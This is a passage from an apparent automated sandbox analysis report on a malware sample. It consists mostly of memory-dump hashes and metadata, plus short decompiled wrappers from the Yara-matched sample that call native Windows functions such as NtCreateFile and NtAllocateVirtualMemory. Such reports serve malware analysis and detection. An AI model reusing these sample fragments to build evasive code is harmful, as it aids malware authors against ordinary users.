                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3d75cc32d2a7aa93328b548fc689a3b681b4b2b4bc3b2272a97079c391279895
                                                                            • Instruction ID: cd960a306e561a124915c898b726169abae2deae1c9b6bb2972191feac76c9bf
                                                                            • Opcode Fuzzy Hash: 3d75cc32d2a7aa93328b548fc689a3b681b4b2b4bc3b2272a97079c391279895
                                                                            • Instruction Fuzzy Hash: 2EE08CB192930CDEC704FFA4E404AACB77DFB02241F10466DD40422262EB31AA84CA91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8f2f8cefdcce229ecae8f25f5afa96e91c1c4d19de443cdf730af2c39c878f2d
                                                                            • Instruction ID: b1075fe9eda35fa39bde11c35164570a19893ff44af8cee871b63c3ed6ded5ae
                                                                            • Opcode Fuzzy Hash: 8f2f8cefdcce229ecae8f25f5afa96e91c1c4d19de443cdf730af2c39c878f2d
                                                                            • Instruction Fuzzy Hash: 6BE04FB4D09208EFCB08DF94D5816ACFBB4FB89304F10C4A9DC0863341DB355A42CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 81e3a1e8c925c9be21b3bc227bb58b53864dddd29d6de8ef75ef2c923f2b1423
                                                                            • Instruction ID: d814f36e94334af4fb339469df00fb5756f989b7d5ea5d900982f0aeb62741d9
                                                                            • Opcode Fuzzy Hash: 81e3a1e8c925c9be21b3bc227bb58b53864dddd29d6de8ef75ef2c923f2b1423
                                                                            • Instruction Fuzzy Hash: 56E0C2F281A20CEBCB14EFB0D54569D77ADEB02145F504CA5C00993211DE300A008682
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a747511901117753faaad6d48d703103a8f096158bc3d21806326f27dc90bf5a
                                                                            • Instruction ID: 6b705c8f599d6e1b531ad64762eeb8e2c15b9204522f78f1cb9f7ed7e474fed2
                                                                            • Opcode Fuzzy Hash: a747511901117753faaad6d48d703103a8f096158bc3d21806326f27dc90bf5a
                                                                            • Instruction Fuzzy Hash: CAE08CB281A20CEFC700DFB0D505AAD7BACEB06245F0048A9E40997151EE320A10CBC1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1b89d25eb82ac9687e715374c599b1c9df105db862b72879b395d434cf0a3a84
                                                                            • Instruction ID: 0494c217b516b5282e65d4cc442d91a6f3eb500e82a6927f25c4941e42a3b157
                                                                            • Opcode Fuzzy Hash: 1b89d25eb82ac9687e715374c599b1c9df105db862b72879b395d434cf0a3a84
                                                                            • Instruction Fuzzy Hash: A2E0C2F281A20DEBC710EFB0D50869D7BFDEB02148F5089A59009D3111EE700A008A82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 538be720a0ec6bf05af0d73af7f2678dacd8bf3aa6b193ec600e6418a6818a40
                                                                            • Instruction ID: cef983103db9b142141afd532e49d5f26cb8d71af28060e1997c58c3c7a643b9
                                                                            • Opcode Fuzzy Hash: 538be720a0ec6bf05af0d73af7f2678dacd8bf3aa6b193ec600e6418a6818a40
                                                                            • Instruction Fuzzy Hash: 73E0ECB196A20DEFC744EFB8E54669CBFB9AB19245F1040A9B808A3345EB305A41CA51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 46d299e85f5c071a906c84b03d26420c6fc408865d2ebd9a13e2eaf9c6ce9b28
                                                                            • Instruction ID: 35e4d4c34a96ba49e2f0f4726edadea84b7c111dc79bedfe9101a860b15d3ad9
                                                                            • Opcode Fuzzy Hash: 46d299e85f5c071a906c84b03d26420c6fc408865d2ebd9a13e2eaf9c6ce9b28
                                                                            • Instruction Fuzzy Hash: 97E0ECB096A30CEFC744EFB8D54A69DBFB8EB09245F1080A99808E3345EF305A44CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2fa2554c905c90d0a301952f35566147f09fd550226c4e02a93a35faaafc1fbd
                                                                            • Instruction ID: c7f7801bbfbbfc4f414fdc99e08c3ea2640d44d58c2799f92294d4773f5fb48d
                                                                            • Opcode Fuzzy Hash: 2fa2554c905c90d0a301952f35566147f09fd550226c4e02a93a35faaafc1fbd
                                                                            • Instruction Fuzzy Hash: CCE01274919208EBC704EFA4E58196CBB7DFB46305F20C5ADD84867345CB315E56CF85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c2ff25f637703da39cfb7aaece5a1d3917ff9197932cd86c8c1dcefad44b5bb4
                                                                            • Instruction ID: 6293804cdbb0099e8fbdc8913a6ff89b96430df269b918867b78dcb65345b439
                                                                            • Opcode Fuzzy Hash: c2ff25f637703da39cfb7aaece5a1d3917ff9197932cd86c8c1dcefad44b5bb4
                                                                            • Instruction Fuzzy Hash: 05F0B2B092015ACFDB50DF64DA69B9CBBB5BB48300F0089AAA40BB7654DF341A84CF10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b21356779a342b00dc53e9e0f4551143fe261fa39b39924a0dc66d55df729451
                                                                            • Instruction ID: d8d161dd0ea7169cdceca586f05f402dfdccfbf460a2e0299255dda0b928fa6b
                                                                            • Opcode Fuzzy Hash: b21356779a342b00dc53e9e0f4551143fe261fa39b39924a0dc66d55df729451
                                                                            • Instruction Fuzzy Hash: 49E02633908550CFC720ABA8E3843903F719701321F064496D84A9F017C330CC80C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 997bde47e6b31d09437475601ccbbc27e47b70fbb8e4776e119c96056237c653
                                                                            • Instruction ID: 674c883f486bcb20163ee6fe02c13e52790bee59ab2b75a11649ac5a9245915a
                                                                            Non-executed Functions

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 08f88501cbb9ca5b79e4f78d43a73f655f1512f473203af210a1eb1f7f8d8c67
                                                                            • Instruction ID: 4abfe82ab0e8e6e9183a0693e0a9e21a29d42be0e283bc8c68ec72a372fb6b81
                                                                            • Opcode Fuzzy Hash: 08f88501cbb9ca5b79e4f78d43a73f655f1512f473203af210a1eb1f7f8d8c67
                                                                            • Instruction Fuzzy Hash: 4C22C0B4E002198FDB14CFA9C985BEDBBF6FF88314F14816AE509AB255D7349981CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: /1O
                                                                            • API String ID: 0-1159016050
                                                                            • Opcode ID: 7e448a1ea80ba1e99169d9008606f448d0aa54213518d6ddb2c8604663d6e9f6
                                                                            • Instruction ID: df7cdafaa83d734816aaee7f594eb1c014f5388f0366bd77bb79ec600fc58b19
                                                                            • Opcode Fuzzy Hash: 7e448a1ea80ba1e99169d9008606f448d0aa54213518d6ddb2c8604663d6e9f6
                                                                            • Instruction Fuzzy Hash: 33A1CBB0E006289BDBA5DF69C984B8DBBF5FF48304F1181E9D098E6205EB319A95CF11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Executed Functions

                                                                            APIs
                                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: *9A
                                                                            • API String ID: 2738559852-3318015640
                                                                            • Opcode ID: 5b5ae100ddbca5d0afcf9688b1fc5f58017fee444e12436448ef003846f2f808
                                                                            • Instruction ID: 12fd63adb0fb678a40cbb9dbf4e4ef7841bd99cac4b8e234ccc6183831b054bd
                                                                            • Opcode Fuzzy Hash: 5b5ae100ddbca5d0afcf9688b1fc5f58017fee444e12436448ef003846f2f808
                                                                            • Instruction Fuzzy Hash: 5F1132B6200108AFCB08DFA9DC84DEB77ADEF8C350B148649FA5DD7241C634E8128BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 68%
                                                                            			E0041867A(signed int __eax, void* __ebx, void* _a1, void* _a4, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a40) {
                                                                            				signed int _v5;
                                                                            
                                                                            				asm("aam 0xcb");
                                                                            				_t1 =  &_v5;
                                                                            				 *_t1 = _v5 & __eax;
                                                                            				if ( *_t1 != 0) goto L4;
                                                                            			}





                                                                            APIs
                                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: A:A
                                                                            • API String ID: 2738559852-2859176346
                                                                            • Opcode ID: c08a8e6d134c8fbb7e10b0408200612589c7842e0deb7065763ff3f192f8c184
                                                                            • Instruction ID: 2f757d61af378a123817b74c663fa689d5c26f4a8ce399f9004c72f95e490d44
                                                                            • Opcode Fuzzy Hash: c08a8e6d134c8fbb7e10b0408200612589c7842e0deb7065763ff3f192f8c184
                                                                            • Instruction Fuzzy Hash: E9016DB2200108BBDB18DF98CC95EEB77A9EF8C354F058649FE0CA7241C630E900CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: A:A
                                                                            • API String ID: 2738559852-2859176346
                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                            • Instruction ID: 6c7918579f63920fb86cd593affe8adf5c0c2a6eede5319f465e69fff998d711
                                                                            • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                            • Instruction Fuzzy Hash: 140152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                            			E004185CA(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                            				long _t21;
                                                                            
                                                                            				asm("adc al, 0xc7");
                                                                            				_t15 = _a4;
                                                                            				_t3 = _t15 + 0xc40; // 0xc40
                                                                            				E004191D0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                            				return _t21;
                                                                            			}





                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 390caab744daf5e02e8ba3b1f3c31110a532ab74553782deafef2ef63e94ca90
                                                                            • Instruction ID: fbc9bb5dded0252d1e6f7dc337aa802358ba39cf4a24b61eceedd20d47d24c39
                                                                            • Opcode Fuzzy Hash: 390caab744daf5e02e8ba3b1f3c31110a532ab74553782deafef2ef63e94ca90
                                                                            • Instruction Fuzzy Hash: 6E01AFB2215108ABCB08CF88DC95EEB77E9AF8C754F158248FA0D97241C630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                            				long _t21;
                                                                            
                                                                            				_t3 = _a4 + 0xc40; // 0xc40
                                                                            				E004191D0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                            				return _t21;
                                                                            			}





                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                            			E004187AA(intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
                                                                            				long _t14;
                                                                            
                                                                            				asm("std");
                                                                            				_t10 = _a8;
                                                                            				_t3 = _t10 + 0xc60; // 0xca0
                                                                            				E004191D0(_a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
                                                                            				_t14 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
                                                                            				return _t14;
                                                                            			}





                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 2e704c497ad9346261968df925699caa001921f9fc81b7c1df521c2d2dbb3965
                                                                            • Instruction ID: a84316d7603cd4b96a0b70d1cb6443dc91b73f185ddf853c5aae569aaccc0fe2
                                                                            • Opcode Fuzzy Hash: 2e704c497ad9346261968df925699caa001921f9fc81b7c1df521c2d2dbb3965
                                                                            • Instruction Fuzzy Hash: 30F0F8B6200109ABDB14DF99DC94EE777A9BF98254F158249FA0897241C631E911CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                            				long _t14;
                                                                            
                                                                            				_t3 = _a4 + 0xc60; // 0xca0
                                                                            				E004191D0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                            				return _t14;
                                                                            			}





                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                            			E004186FA(void* __ebx, intOrPtr _a8, void* _a12) {
                                                                            				long _t8;
                                                                            
                                                                            				_pop(_t18);
                                                                            				_t5 = _a8;
                                                                            				_t2 = _t5 + 0x10; // 0x300
                                                                            				_t3 = _t5 + 0xc50; // 0x409773
                                                                            				E004191D0(_a8, _t3,  *_t2, 0, 0x2c);
                                                                            				_t8 = NtClose(_a12); // executed
                                                                            				return _t8;
                                                                            			}





                                                                            APIs
                                                                            • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: eeebd00c5717df60cf00ec7130de4518e86694591e7402de10c3e16ed19930b8
                                                                            • Instruction ID: f91f12f76969bfede9cd18d8bab70bad15cd4c5d11c27978160d85291436c030
                                                                            • Opcode Fuzzy Hash: eeebd00c5717df60cf00ec7130de4518e86694591e7402de10c3e16ed19930b8
                                                                            • Instruction Fuzzy Hash: 94E0C2362002047BD714EFD8CC89EDB77A8EF447A0F154599BA095B242D230EA40C7D0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00418700(intOrPtr _a4, void* _a8) {
                                                                            				long _t8;
                                                                            
                                                                            				_t5 = _a4;
                                                                            				_t2 = _t5 + 0x10; // 0x300
                                                                            				_t3 = _t5 + 0xc50; // 0x409773
                                                                            				E004191D0(_a4, _t3,  *_t2, 0, 0x2c);
                                                                            				_t8 = NtClose(_a8); // executed
                                                                            				return _t8;
                                                                            			}





                                                                            APIs
                                                                            • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 10a7630be49793a51c318046d304632aa6c4e292ac9677874f9e47114b896cc5
                                                                            • Instruction ID: 01749763257491064d1ccedc11d83f2f38f2441804349d263c645a42a3d252c5
                                                                            • Opcode Fuzzy Hash: 10a7630be49793a51c318046d304632aa6c4e292ac9677874f9e47114b896cc5
                                                                            • Instruction Fuzzy Hash: 589002B120100902D2407299844474A0105A7D0741F51C025A5454594EC6998DD57BE5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 853008e96714716008eafd015a6db2b29b2a5fd08fa64692e8d36459cbafd25d
                                                                            • Instruction ID: a0139bfa2ade770cbc0f30d0ea3967e82e77683b719cada1d1fcba6e510ad667
                                                                            • Opcode Fuzzy Hash: 853008e96714716008eafd015a6db2b29b2a5fd08fa64692e8d36459cbafd25d
                                                                            • Instruction Fuzzy Hash: 7B9002B134100942D20062998454B0A0105E7E1741F51C029E1454594DC659CC5276A6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3d7b47bfd6f38269f566886e9a162ef28a65974bcbeea97eb3589578205165ec
                                                                            • Instruction ID: 8acf6679264530ef7ecdcbda08f3564cd1fda9f0bd74576c1fbd1fb4db6a5215
                                                                            • Opcode Fuzzy Hash: 3d7b47bfd6f38269f566886e9a162ef28a65974bcbeea97eb3589578205165ec
                                                                            • Instruction Fuzzy Hash: 56900271242046525645B299844450B4106B7E0681791C026A1804990CC5669856EBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4c879d98b7a9063503a38def3e0cc0dab1b5a10138e8529a1beb8afb68eee3e3
                                                                            • Instruction ID: bb5cb69ae16022cf1d80f8316ecef624c5f9b24bcf2a2c34ddf66229cef7d20f
                                                                            • Opcode Fuzzy Hash: 4c879d98b7a9063503a38def3e0cc0dab1b5a10138e8529a1beb8afb68eee3e3
                                                                            • Instruction Fuzzy Hash: CC90027120100913D2116299854470B0109A7D0681F91C426A0814598DD6968952B6A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 66cce0f4411ff63141a57f172941b956611cc1cac4f48754764a4a8b7332776f
                                                                            • Instruction ID: 0ab333789e0f32263ff21833224596b5f7c988e4330deefb5869e4741e844ff4
                                                                            • Opcode Fuzzy Hash: 66cce0f4411ff63141a57f172941b956611cc1cac4f48754764a4a8b7332776f
                                                                            • Instruction Fuzzy Hash: C490027160100A02D2017299844461A010AA7D0681F91C036A1414595ECA658992B6B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 8b11254082d2f7171ea24e25528cf85b1e82ac1ec7f0b8fad27595b8bf6e0ba8
                                                                            • Instruction ID: 58283a773055c8b11f0245c99055186e1886db07c1aa2279efd6a9a775a6aed7
                                                                            • Opcode Fuzzy Hash: 8b11254082d2f7171ea24e25528cf85b1e82ac1ec7f0b8fad27595b8bf6e0ba8
                                                                            • Instruction Fuzzy Hash: 6390027120140902D2006299885470F0105A7D0742F51C025A1554595DC66588517AF1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 781ed1ce80d17cfd5791a78dd8f5d23f90bba14251747e874734cd8e069a287c
                                                                            • Instruction ID: 86ea89cb9563fe676b54dad144c5a88c9fd07b314a75c28baa1852a7052280d6
                                                                            • Opcode Fuzzy Hash: 781ed1ce80d17cfd5791a78dd8f5d23f90bba14251747e874734cd8e069a287c
                                                                            • Instruction Fuzzy Hash: CB90027160100542424072A9C88490A4105BBE1651751C135A0D88590DC59988656BE5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
